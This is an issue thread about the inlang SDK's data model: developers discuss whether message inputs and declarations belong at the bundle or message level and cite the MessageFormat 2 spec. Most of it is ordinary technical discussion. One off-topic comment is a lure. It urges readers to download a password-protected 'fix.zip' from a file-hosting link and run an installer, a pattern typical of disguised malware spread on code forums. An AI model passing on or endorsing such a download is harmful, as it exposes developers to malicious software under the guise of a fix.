### ISSUE TITLE
declarations have a confusing UX and potentially wrong data structure

### ISSUE THREAD

**Issue by samuelstroschein** [opral/inlang-sdk#142]
### Context

Inputs are added on a bundle level even though it's saved in messages, leading to 

* multiple changes that are created instead of just 1 (every messages input is updated)
* complexity in the UI components because a `<inlang-bundle>` component emits events for messages

[Understanding Data Structures in UI Development 🧩](https://www.loom.com/share/94f13aad62fd4cca98f46fdd266a0742?sid=c3747942-b062-4a55-91a2-e5889823fae3)

### Potential solutions

1. Don't let users define inputs on a bundle level (inputs are derived from messages, but can't be edited in the bundle component) 
2. Move declarations on the bundle level

**Comment by samuelstroschein** [comment]
cc @nils.jacobsen

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by samuelstroschein** [comment]
Given the insight in [MESDK-193](https://linear.app/opral/issue/MESDK-193/bundle-messagereference), we likely get rid of bundles which would imply solution 1 (inputs are not defined on the bundle level in the UI)

**Comment by NilsJacobsen** [comment]
The UX is right -> mental model arguments of m function are not different per locale. Renaming bundle doesn't change anything. I think solution 2 is way better. Or postpone it.

**Comment by samuelstroschein** [comment]
@nils.jacobsen but the arguments of the m function are derived from the messages no? or do you want everyone to define the arguments on the bundle level?

**Comment by NilsJacobsen** [comment]
They are and that is not correct. Because they don't differ per locale. Why should I define arguments on a message level and sync it to every other message in the bundle?

**Comment by samuelstroschein** [comment]
@martin.lysk1 that's the issue we talked about (whether inputs should be defined on a "bundle")

**Comment by samuelstroschein** [comment]
Working with Paraglide JS atm: Yes, the declaration stuff is confusing. 

1. The top level concept is a message, not a bundle. 
2. Inputs need to declared at the top level concept (they can't differ per locale!)
3. Is the missing concept "grouping variants"? 

Let's sync about this tmr @martin.lysk1 @nils.jacobsen?

[Insights on Paraglide.js 🚀](https://www.loom.com/share/6848cd1bba0a4f87ba54852ccfb6ca04?sid=5ff69cb9-313d-4ee9-a208-1f99b911d95b)

**Comment by samuelstroschein** [comment]
Update: Our data model makes sense when lookin at compiled output. 

* renaming bundle to message reference make sense
* a message reference holding the inputs makes sense
* a message defining declarations (derived state from the input) makes sense

@martin.lysk1 @nils.jacobsen the last outstanding question is "MessageReference" or a better word? Inputs should definitely move to the "MessageReference"

[Understanding Message Structures in Paraglide.js](https://www.loom.com/share/180980a1420f4907be922d03a2414d6a?sid=85fe1d16-af51-4c89-aa89-6ad0c86d61ee)

**Comment by samuelstroschein** [comment]
`MessageBundle`

`MessageGroup`

`MessageReference`

**Comment by NilsJacobsen** [comment]
Let's move inputs to bundle. I honestly don't see a huge downside of not renaming it. Most critical wording in sherlock `extract message` can stay the same. In the bundle ui we don't name the concepts.

**Comment by martin-lysk** [comment]
I read in the icu2 again

I may miss something here but it seems like an input declaration is not even needed?

> If a *declaration* exists for the *variable*, its resolved value is used. Otherwise, the *variable* is an implicit reference to an input value, and its value is looked up from the *formatting context* *input mapping*.

[https://github.com/unicode-org/message-format-wg/blob/42620a11409bb0a98e6cf8f42811e30ec7e50c79/spec/formatting.md#variable-resolution](https://github.com/unicode-org/message-format-wg/blob/42620a11409bb0a98e6cf8f42811e30ec7e50c79/spec/formatting.md#variable-resolution)<br>Also important to understand - external input doesn't need to be provided via parameter - some variables might be provided via the formatting context. 

> An ***external variable*** is a *variable* whose *name* and initial value are supplied by the caller to MessageFormat or available in the *formatting context*. Only an *external variable* **can** appear as an *operand* in an *input declaration*.

This is the case for currency symbols zero separators etc. In some cases also for user properties like users gender. Those external may not be passed as arguments. <br>[https://github.com/unicode-org/message-format-wg/blob/42620a11409bb0a98e6cf8f42811e30ec7e50c79/spec/syntax.md#the-message](https://github.com/unicode-org/message-format-wg/blob/42620a11409bb0a98e6cf8f42811e30ec7e50c79/spec/syntax.md#the-message)

I will read a bit further…

**Comment by samuelstroschein** [comment]
@martin.lysk1 i'd say at this point "screw icu2". we are going crazy with icu2 similar to the git story. we have different requirements/environements. looking at inlang should yield the requirements we need. 

* inputs defined on bundle level 
* declarations and selectors on message level

**Comment by samuelstroschein** [comment]
After a sync with @martin.lysk1 we decided: 

* Inputs are declared both on the bundle and message level. 
* Defining inputs on the bundle level allows validation rules like "a message uses an input that is not agreed up on in the bundle"
* Defining inputs on the message level allows importing messages that use inputs without modifying a bundle. The discrepancy between message and bundle inputs can later be resolved with a validation rule.

**Comment by samuelstroschein** [comment]
Wait, given that defining inputs on the bundle level gives the advantage of validating inputs with [lix validation rules](https://linear.app/opral/project/lix-validation-rules-bdf46c532aa1), it doesn't seem to make sense to introduce them now. Lix validation rules are approximately 2 months away. 

Furthermore, I do face slight ambiguity if inputs on the bundle level should be identical to inputs on the message level. We discussed yes but as I was about to implement I am unsure again. For example, an input on a message can go through a function like `plural(input.count)`. For inputs on the bundle level however, it seems like we just need to ensure that `input.count` is a valid input, not what functions it goes through. 

**Proposal** 

Delay introducing bundle.inputs until we have [lix validation rules](https://linear.app/opral/project/lix-validation-rules-bdf46c532aa1) and clarity on the requirements of users regarding what to validate. 

* we know we want inputs on the message level for importers and exporters 
* adding an inputs property on bundles is non-breaking
* the value of adding inputs on bundles only unfolds once [lix validation rules](https://linear.app/opral/project/lix-validation-rules-bdf46c532aa1) ship.

@martin.lysk1 do you agree on the proposal? then i would cancel [MESDK-233](https://linear.app/opral/issue/MESDK-233/add-bundleinputs)

**Comment by samuelstroschein** [comment]
Potentially relevant again after [MESDK-238](https://linear.app/opral/issue/MESDK-238/model-import-crud-sdk-export)
